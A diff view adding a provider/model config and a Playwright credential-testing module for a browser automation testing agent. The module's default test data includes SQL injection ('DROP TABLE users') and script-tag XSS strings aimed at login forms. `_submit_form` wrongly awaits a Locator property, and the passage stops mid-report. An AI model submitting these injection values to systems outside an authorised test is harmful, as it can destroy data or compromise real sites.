|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Configuration
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Configuration settings and constants for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
# Maps internal provider keys to the human-readable names shown in the UI.
PROVIDER_DISPLAY_NAMES = {
    "openai": "OpenAI",
    "azure_openai": "Azure OpenAI",
    "anthropic": "Anthropic",
    "deepseek": "DeepSeek",
    "google": "Google",
    "alibaba": "Alibaba",
    "moonshot": "MoonShot",
    "unbound": "Unbound AI",
    "ibm": "IBM",
    "grok": "Grok",
}
|
| 24 |
+
|
| 25 |
+
# Predefined model names for common providers
# Keys are provider identifiers; values are the model ids offered in the
# model dropdown for that provider.  Keys here need not match
# PROVIDER_DISPLAY_NAMES exactly (e.g. "ollama", "mistral", "siliconflow"
# and "modelscope" have model lists but no display name).
model_names = {
    "anthropic": ["claude-3-5-sonnet-20241022", "claude-3-5-sonnet-20240620", "claude-3-opus-20240229"],
    "openai": ["gpt-4o", "gpt-4", "gpt-3.5-turbo", "o3-mini"],
    "deepseek": ["deepseek-chat", "deepseek-reasoner"],
    "google": ["gemini-2.0-flash", "gemini-2.0-flash-thinking-exp", "gemini-1.5-flash-latest",
               "gemini-1.5-flash-8b-latest", "gemini-2.0-flash-thinking-exp-01-21", "gemini-2.0-pro-exp-02-05",
               "gemini-2.5-pro-preview-03-25", "gemini-2.5-flash-preview-04-17"],
    "ollama": ["qwen2.5:7b", "qwen2.5:14b", "qwen2.5:32b", "qwen2.5-coder:14b", "qwen2.5-coder:32b", "llama2:7b",
               "deepseek-r1:14b", "deepseek-r1:32b"],
    "azure_openai": ["gpt-4o", "gpt-4", "gpt-3.5-turbo"],
    "mistral": ["pixtral-large-latest", "mistral-large-latest", "mistral-small-latest", "ministral-8b-latest"],
    "alibaba": ["qwen-plus", "qwen-max", "qwen-vl-max", "qwen-vl-plus", "qwen-turbo", "qwen-long"],
    "moonshot": ["moonshot-v1-32k-vision-preview", "moonshot-v1-8k-vision-preview"],
    "unbound": ["gemini-2.0-flash", "gpt-4o-mini", "gpt-4o", "gpt-4.5-preview"],
    "grok": [
        "grok-3",
        "grok-3-fast",
        "grok-3-mini",
        "grok-3-mini-fast",
        "grok-2-vision",
        "grok-2-image",
        "grok-2",
    ],
    "siliconflow": [
        "deepseek-ai/DeepSeek-R1",
        "deepseek-ai/DeepSeek-V3",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-32B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-7B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
        "deepseek-ai/DeepSeek-V2.5",
        "deepseek-ai/deepseek-vl2",
        "Qwen/Qwen2.5-72B-Instruct-128K",
        "Qwen/Qwen2.5-72B-Instruct",
        "Qwen/Qwen2.5-32B-Instruct",
        "Qwen/Qwen2.5-14B-Instruct",
        "Qwen/Qwen2.5-7B-Instruct",
        "Qwen/Qwen2.5-Coder-32B-Instruct",
        "Qwen/Qwen2.5-Coder-7B-Instruct",
        "Qwen/Qwen2-7B-Instruct",
        "Qwen/Qwen2-1.5B-Instruct",
        "Qwen/QwQ-32B-Preview",
        "Qwen/Qwen2-VL-72B-Instruct",
        "Qwen/Qwen2.5-VL-32B-Instruct",
        "Qwen/Qwen2.5-VL-72B-Instruct",
        "TeleAI/TeleChat2",
        "THUDM/glm-4-9b-chat",
        "Vendor-A/Qwen/Qwen2.5-72B-Instruct",
        "internlm/internlm2_5-7b-chat",
        "internlm/internlm2_5-20b-chat",
        "Pro/Qwen/Qwen2.5-7B-Instruct",
        "Pro/Qwen/Qwen2-7B-Instruct",
        "Pro/Qwen/Qwen2-1.5B-Instruct",
        "Pro/THUDM/chatglm3-6b",
        "Pro/THUDM/glm-4-9b-chat",
    ],
    "ibm": ["ibm/granite-vision-3.1-2b-preview", "meta-llama/llama-4-maverick-17b-128e-instruct-fp8",
            "meta-llama/llama-3-2-90b-vision-instruct"],
    "modelscope": [
        "Qwen/Qwen2.5-Coder-32B-Instruct",
        "Qwen/Qwen2.5-Coder-14B-Instruct",
        "Qwen/Qwen2.5-Coder-7B-Instruct",
        "Qwen/Qwen2.5-72B-Instruct",
        "Qwen/Qwen2.5-32B-Instruct",
        "Qwen/Qwen2.5-14B-Instruct",
        "Qwen/Qwen2.5-7B-Instruct",
        "Qwen/QwQ-32B-Preview",
        "Qwen/Qwen2.5-VL-3B-Instruct",
        "Qwen/Qwen2.5-VL-7B-Instruct",
        "Qwen/Qwen2.5-VL-32B-Instruct",
        "Qwen/Qwen2.5-VL-72B-Instruct",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-32B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-7B",
        "deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
        "deepseek-ai/DeepSeek-R1",
        "deepseek-ai/DeepSeek-V3",
        "Qwen/Qwen3-1.7B",
        "Qwen/Qwen3-4B",
        "Qwen/Qwen3-8B",
        "Qwen/Qwen3-14B",
        "Qwen/Qwen3-30B-A3B",
        "Qwen/Qwen3-32B",
        "Qwen/Qwen3-235B-A22B",
    ],
}
|
src/utils/credential_manager.py
ADDED
|
@@ -0,0 +1,628 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Credential Manager
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Secure credential management and testing system.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import json
|
| 15 |
+
import hashlib
|
| 16 |
+
import base64
|
| 17 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 18 |
+
from dataclasses import dataclass
|
| 19 |
+
from datetime import datetime
|
| 20 |
+
import random
|
| 21 |
+
import string
|
| 22 |
+
|
| 23 |
+
from playwright.async_api import Page, Locator
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
@dataclass
class CredentialSet:
    """Represents a set of credentials for testing."""
    name: str  # human-readable label for this credential pair
    email: str  # also used for username-style login fields
    password: str
    description: str  # free-text note on what this pair exercises
    is_valid: bool  # whether the pair is expected to authenticate successfully
    category: str  # valid, invalid, edge_case, security_test
    created_at: datetime  # when this set was registered
|
| 37 |
+
|
| 38 |
+
@dataclass
class CredentialTestResult:
    """Result of testing with specific credentials."""
    credential_set: CredentialSet  # the credentials that were exercised
    success: bool  # True when the observed outcome matched the expected one
    response_type: str  # success, validation_error, security_error, etc.
    error_message: Optional[str] = None  # populated only on unexpected exceptions
    screenshot_path: Optional[str] = None  # pre-submission screenshot, if taken
    timestamp: Optional[datetime] = None  # when the test ran (None if never executed)
|
| 47 |
+
|
| 48 |
+
class CredentialManager:
    """Advanced credential management and testing system.

    Discovers login fields on a Playwright page, drives form submissions with
    a catalog of valid / invalid / edge-case / security-test credentials, and
    aggregates the outcomes into a report.
    """

    def __init__(self, page: Page):
        # Page used for field discovery, form filling, submission and screenshots.
        self.page = page
        # All credential sets known to this manager (defaults + custom/imported).
        self.credential_sets: List[CredentialSet] = []
        # Results accumulated by test_credentials() across runs.
        self.test_results: List[CredentialTestResult] = []
        # NOTE(review): this key is generated but never used — export/import
        # below only base64-encode. Confirm whether real encryption is intended.
        self.encryption_key = self._generate_encryption_key()

        # Initialize with default credential sets
        self._initialize_default_credentials()
|
| 59 |
+
|
| 60 |
+
def _generate_encryption_key(self) -> str:
|
| 61 |
+
"""Generate a simple encryption key for credential storage."""
|
| 62 |
+
return hashlib.sha256(f"fagun_credential_key_{datetime.now().isoformat()}".encode()).hexdigest()[:32]
|
| 63 |
+
|
| 64 |
+
    def _initialize_default_credentials(self):
        """Initialize with default credential sets for testing.

        Seeds self.credential_sets with a fixed catalog covering four
        categories: valid, invalid, edge_case and security_test (SQL
        injection / XSS payloads that must be rejected).
        """
        default_credentials = [
            # Valid credentials
            CredentialSet(
                name="Valid User 1",
                email="testuser1@example.com",
                password="ValidPass123!",
                description="Standard valid credentials",
                is_valid=True,
                category="valid",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="Valid User 2",
                email="admin@testdomain.org",
                password="AdminPass456@",
                description="Admin valid credentials",
                is_valid=True,
                category="valid",
                created_at=datetime.now()
            ),

            # Invalid credentials
            CredentialSet(
                name="Invalid Email",
                email="invalid-email-format",
                password="ValidPass123!",
                description="Invalid email format",
                is_valid=False,
                category="invalid",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="Invalid Password",
                email="test@example.com",
                password="weak",
                description="Weak password",
                is_valid=False,
                category="invalid",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="Empty Credentials",
                email="",
                password="",
                description="Empty email and password",
                is_valid=False,
                category="invalid",
                created_at=datetime.now()
            ),

            # Edge case credentials
            CredentialSet(
                name="Special Characters",
                email="test+special@example.com",
                password="Pass@123!@#$%",
                description="Credentials with special characters",
                is_valid=True,
                category="edge_case",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="Long Email",
                email="very.long.email.address.for.testing.purposes@verylongdomainname.com",
                password="ValidPass123!",
                description="Very long email address",
                is_valid=True,
                category="edge_case",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="Unicode Email",
                email="测试@example.com",
                password="ValidPass123!",
                description="Email with Unicode characters",
                is_valid=True,
                category="edge_case",
                created_at=datetime.now()
            ),

            # Security test credentials
            CredentialSet(
                name="SQL Injection Email",
                email="admin'; DROP TABLE users; --",
                password="ValidPass123!",
                description="SQL injection attempt in email",
                is_valid=False,
                category="security_test",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="XSS Email",
                email="<script>alert('XSS')</script>@example.com",
                password="ValidPass123!",
                description="XSS attempt in email",
                is_valid=False,
                category="security_test",
                created_at=datetime.now()
            ),
            CredentialSet(
                name="SQL Injection Password",
                email="test@example.com",
                password="'; DROP TABLE users; --",
                description="SQL injection attempt in password",
                is_valid=False,
                category="security_test",
                created_at=datetime.now()
            )
        ]

        self.credential_sets.extend(default_credentials)
        logger.info(f"✅ Initialized {len(default_credentials)} default credential sets")
|
| 177 |
+
|
| 178 |
+
def add_credential_set(self, name: str, email: str, password: str,
|
| 179 |
+
description: str = "", category: str = "custom") -> bool:
|
| 180 |
+
"""Add a new credential set."""
|
| 181 |
+
try:
|
| 182 |
+
credential_set = CredentialSet(
|
| 183 |
+
name=name,
|
| 184 |
+
email=email,
|
| 185 |
+
password=password,
|
| 186 |
+
description=description,
|
| 187 |
+
is_valid=self._validate_credentials(email, password),
|
| 188 |
+
category=category,
|
| 189 |
+
created_at=datetime.now()
|
| 190 |
+
)
|
| 191 |
+
|
| 192 |
+
self.credential_sets.append(credential_set)
|
| 193 |
+
logger.info(f"✅ Added credential set: {name}")
|
| 194 |
+
return True
|
| 195 |
+
|
| 196 |
+
except Exception as e:
|
| 197 |
+
logger.error(f"❌ Error adding credential set: {e}")
|
| 198 |
+
return False
|
| 199 |
+
|
| 200 |
+
def _validate_credentials(self, email: str, password: str) -> bool:
|
| 201 |
+
"""Validate if credentials are in correct format."""
|
| 202 |
+
# Basic email validation
|
| 203 |
+
email_valid = "@" in email and "." in email.split("@")[-1]
|
| 204 |
+
|
| 205 |
+
# Basic password validation (at least 8 characters)
|
| 206 |
+
password_valid = len(password) >= 8
|
| 207 |
+
|
| 208 |
+
return email_valid and password_valid
|
| 209 |
+
|
| 210 |
+
def get_credentials_by_category(self, category: str) -> List[CredentialSet]:
|
| 211 |
+
"""Get credentials by category."""
|
| 212 |
+
return [cred for cred in self.credential_sets if cred.category == category]
|
| 213 |
+
|
| 214 |
+
def get_credentials_by_validity(self, is_valid: bool) -> List[CredentialSet]:
|
| 215 |
+
"""Get credentials by validity."""
|
| 216 |
+
return [cred for cred in self.credential_sets if cred.is_valid == is_valid]
|
| 217 |
+
|
| 218 |
+
async def discover_credential_fields(self) -> Dict[str, Locator]:
|
| 219 |
+
"""Discover email and password fields on the page."""
|
| 220 |
+
logger.info("🔍 Discovering credential fields...")
|
| 221 |
+
|
| 222 |
+
fields = {}
|
| 223 |
+
|
| 224 |
+
try:
|
| 225 |
+
# Find email fields
|
| 226 |
+
email_selectors = [
|
| 227 |
+
"input[type='email']",
|
| 228 |
+
"input[name*='email']",
|
| 229 |
+
"input[placeholder*='email' i]",
|
| 230 |
+
"input[id*='email']",
|
| 231 |
+
"input[class*='email']"
|
| 232 |
+
]
|
| 233 |
+
|
| 234 |
+
for selector in email_selectors:
|
| 235 |
+
elements = await self.page.locator(selector).all()
|
| 236 |
+
if elements:
|
| 237 |
+
fields["email"] = elements[0]
|
| 238 |
+
logger.info(f"📧 Found email field: {selector}")
|
| 239 |
+
break
|
| 240 |
+
|
| 241 |
+
# Find password fields
|
| 242 |
+
password_selectors = [
|
| 243 |
+
"input[type='password']",
|
| 244 |
+
"input[name*='password']",
|
| 245 |
+
"input[placeholder*='password' i]",
|
| 246 |
+
"input[id*='password']",
|
| 247 |
+
"input[class*='password']"
|
| 248 |
+
]
|
| 249 |
+
|
| 250 |
+
for selector in password_selectors:
|
| 251 |
+
elements = await self.page.locator(selector).all()
|
| 252 |
+
if elements:
|
| 253 |
+
fields["password"] = elements[0]
|
| 254 |
+
logger.info(f"🔐 Found password field: {selector}")
|
| 255 |
+
break
|
| 256 |
+
|
| 257 |
+
# Find username fields (alternative to email)
|
| 258 |
+
if "email" not in fields:
|
| 259 |
+
username_selectors = [
|
| 260 |
+
"input[name*='username']",
|
| 261 |
+
"input[name*='user']",
|
| 262 |
+
"input[placeholder*='username' i]",
|
| 263 |
+
"input[placeholder*='user' i]",
|
| 264 |
+
"input[id*='username']",
|
| 265 |
+
"input[id*='user']"
|
| 266 |
+
]
|
| 267 |
+
|
| 268 |
+
for selector in username_selectors:
|
| 269 |
+
elements = await self.page.locator(selector).all()
|
| 270 |
+
if elements:
|
| 271 |
+
fields["username"] = elements[0]
|
| 272 |
+
logger.info(f"��� Found username field: {selector}")
|
| 273 |
+
break
|
| 274 |
+
|
| 275 |
+
logger.info(f"✅ Field discovery complete: {list(fields.keys())}")
|
| 276 |
+
return fields
|
| 277 |
+
|
| 278 |
+
except Exception as e:
|
| 279 |
+
logger.error(f"❌ Error discovering credential fields: {e}")
|
| 280 |
+
return {}
|
| 281 |
+
|
| 282 |
+
    async def test_credentials(self, credential_set: CredentialSet,
                             fields: Dict[str, Locator]) -> CredentialTestResult:
        """Test a specific credential set.

        Clears and fills the discovered fields, captures a screenshot,
        submits the form, waits a fixed 2 s for the page to react, then
        classifies the response and records the result in self.test_results.
        On any exception a failed result with response_type "error" is
        returned instead (and is NOT appended to self.test_results).
        """
        logger.info(f"🧪 Testing credentials: {credential_set.name}")

        try:
            # Clear existing fields
            await self._clear_credential_fields(fields)

            # Fill email/username field
            if "email" in fields:
                await fields["email"].fill(credential_set.email)
            elif "username" in fields:
                await fields["username"].fill(credential_set.email)  # Use email as username

            # Fill password field
            if "password" in fields:
                await fields["password"].fill(credential_set.password)

            # Take screenshot before submission
            # NOTE(review): assumes ./screenshots exists — confirm it is created elsewhere.
            screenshot_path = f"./screenshots/credential_test_{credential_set.name.replace(' ', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.png"
            await self.page.screenshot(path=screenshot_path)

            # Submit form
            await self._submit_form()

            # Wait for response (fixed delay; no explicit navigation wait)
            await asyncio.sleep(2)

            # Analyze result
            response_type = await self._analyze_credential_response()

            # Determine success
            success = self._evaluate_credential_result(credential_set, response_type)

            result = CredentialTestResult(
                credential_set=credential_set,
                success=success,
                response_type=response_type,
                screenshot_path=screenshot_path,
                timestamp=datetime.now()
            )

            self.test_results.append(result)
            logger.info(f"✅ Credential test complete: {credential_set.name} - {response_type}")
            return result

        except Exception as e:
            logger.error(f"❌ Error testing credentials {credential_set.name}: {e}")
            return CredentialTestResult(
                credential_set=credential_set,
                success=False,
                response_type="error",
                error_message=str(e),
                timestamp=datetime.now()
            )
|
| 338 |
+
|
| 339 |
+
async def _clear_credential_fields(self, fields: Dict[str, Locator]):
|
| 340 |
+
"""Clear all credential fields."""
|
| 341 |
+
for field_name, field in fields.items():
|
| 342 |
+
try:
|
| 343 |
+
await field.clear()
|
| 344 |
+
except:
|
| 345 |
+
pass
|
| 346 |
+
|
| 347 |
+
async def _submit_form(self):
|
| 348 |
+
"""Submit the form."""
|
| 349 |
+
try:
|
| 350 |
+
# Try different submit button selectors
|
| 351 |
+
submit_selectors = [
|
| 352 |
+
"button[type='submit']",
|
| 353 |
+
"input[type='submit']",
|
| 354 |
+
"button:has-text('Login')",
|
| 355 |
+
"button:has-text('Sign In')",
|
| 356 |
+
"button:has-text('Submit')",
|
| 357 |
+
"form button",
|
| 358 |
+
"form input[type='submit']"
|
| 359 |
+
]
|
| 360 |
+
|
| 361 |
+
for selector in submit_selectors:
|
| 362 |
+
submit_btn = await self.page.locator(selector).first
|
| 363 |
+
if await submit_btn.count() > 0:
|
| 364 |
+
await submit_btn.click()
|
| 365 |
+
logger.info(f"📤 Form submitted using: {selector}")
|
| 366 |
+
return
|
| 367 |
+
|
| 368 |
+
# If no submit button found, try pressing Enter
|
| 369 |
+
await self.page.keyboard.press("Enter")
|
| 370 |
+
logger.info("📤 Form submitted using Enter key")
|
| 371 |
+
|
| 372 |
+
except Exception as e:
|
| 373 |
+
logger.error(f"❌ Error submitting form: {e}")
|
| 374 |
+
|
| 375 |
+
async def _analyze_credential_response(self) -> str:
|
| 376 |
+
"""Analyze the response after credential submission."""
|
| 377 |
+
try:
|
| 378 |
+
page_content = await self.page.content()
|
| 379 |
+
page_text = page_content.lower()
|
| 380 |
+
|
| 381 |
+
# Check for success indicators
|
| 382 |
+
success_indicators = [
|
| 383 |
+
"welcome", "dashboard", "profile", "account", "logged in",
|
| 384 |
+
"signed in", "success", "thank you", "confirmation"
|
| 385 |
+
]
|
| 386 |
+
|
| 387 |
+
for indicator in success_indicators:
|
| 388 |
+
if indicator in page_text:
|
| 389 |
+
return "success"
|
| 390 |
+
|
| 391 |
+
# Check for validation errors
|
| 392 |
+
validation_indicators = [
|
| 393 |
+
"invalid", "incorrect", "wrong", "error", "failed",
|
| 394 |
+
"required", "missing", "format", "invalid email",
|
| 395 |
+
"invalid password", "password too short"
|
| 396 |
+
]
|
| 397 |
+
|
| 398 |
+
for indicator in validation_indicators:
|
| 399 |
+
if indicator in page_text:
|
| 400 |
+
return "validation_error"
|
| 401 |
+
|
| 402 |
+
# Check for security-related responses
|
| 403 |
+
security_indicators = [
|
| 404 |
+
"security", "blocked", "suspicious", "malicious",
|
| 405 |
+
"injection", "script", "xss", "sql", "forbidden"
|
| 406 |
+
]
|
| 407 |
+
|
| 408 |
+
for indicator in security_indicators:
|
| 409 |
+
if indicator in page_text:
|
| 410 |
+
return "security_error"
|
| 411 |
+
|
| 412 |
+
# Check for authentication errors
|
| 413 |
+
auth_indicators = [
|
| 414 |
+
"not found", "user not found", "account not found",
|
| 415 |
+
"login failed", "authentication failed", "access denied"
|
| 416 |
+
]
|
| 417 |
+
|
| 418 |
+
for indicator in auth_indicators:
|
| 419 |
+
if indicator in page_text:
|
| 420 |
+
return "authentication_error"
|
| 421 |
+
|
| 422 |
+
return "unknown"
|
| 423 |
+
|
| 424 |
+
except Exception as e:
|
| 425 |
+
logger.error(f"❌ Error analyzing credential response: {e}")
|
| 426 |
+
return "error"
|
| 427 |
+
|
| 428 |
+
def _evaluate_credential_result(self, credential_set: CredentialSet, response_type: str) -> bool:
|
| 429 |
+
"""Evaluate if the credential test result is as expected."""
|
| 430 |
+
if credential_set.is_valid:
|
| 431 |
+
# Valid credentials should succeed
|
| 432 |
+
return response_type == "success"
|
| 433 |
+
else:
|
| 434 |
+
# Invalid credentials should fail with appropriate error
|
| 435 |
+
return response_type in ["validation_error", "authentication_error", "security_error"]
|
| 436 |
+
|
| 437 |
+
    async def run_comprehensive_credential_testing(self) -> Dict[str, Any]:
        """Run comprehensive credential testing with all credential sets.

        Discovers the login fields once, then exercises every registered
        credential set sequentially with a 1 s pause between tests.
        Returns the aggregated report dict, or {"error": ...} when no
        credential fields could be found on the page.
        """
        logger.info("🚀 Starting comprehensive credential testing...")

        # Discover credential fields
        fields = await self.discover_credential_fields()

        if not fields:
            logger.warning("⚠️ No credential fields found on the page")
            return {"error": "No credential fields found"}

        # Test all credential sets
        for credential_set in self.credential_sets:
            await self.test_credentials(credential_set, fields)
            await asyncio.sleep(1)  # Delay between tests

        # Generate comprehensive report
        report = self._generate_credential_report()

        logger.info(f"✅ Comprehensive credential testing complete: {len(self.test_results)} tests executed")
        return report
|
| 458 |
+
|
| 459 |
+
    def _generate_credential_report(self) -> Dict[str, Any]:
        """Generate a comprehensive credential testing report.

        Aggregates self.test_results into summary counts, breakdowns by
        category / validity / response type, a detailed per-test list, and
        recommendations from _generate_credential_recommendations().
        """
        total_tests = len(self.test_results)
        passed_tests = sum(1 for r in self.test_results if r.success)
        failed_tests = total_tests - passed_tests

        # Categorize results
        by_category = {}
        by_validity = {"valid": [], "invalid": []}
        by_response_type = {}

        for result in self.test_results:
            category = result.credential_set.category
            validity = "valid" if result.credential_set.is_valid else "invalid"
            response_type = result.response_type

            if category not in by_category:
                by_category[category] = []
            by_category[category].append(result)

            by_validity[validity].append(result)

            if response_type not in by_response_type:
                by_response_type[response_type] = []
            by_response_type[response_type].append(result)

        # Calculate success rates (guarded against division by zero)
        success_rate = (passed_tests / total_tests * 100) if total_tests > 0 else 0

        report = {
            "summary": {
                "total_tests": total_tests,
                "passed_tests": passed_tests,
                "failed_tests": failed_tests,
                "success_rate": round(success_rate, 2),
                "timestamp": datetime.now().isoformat()
            },
            "by_category": {
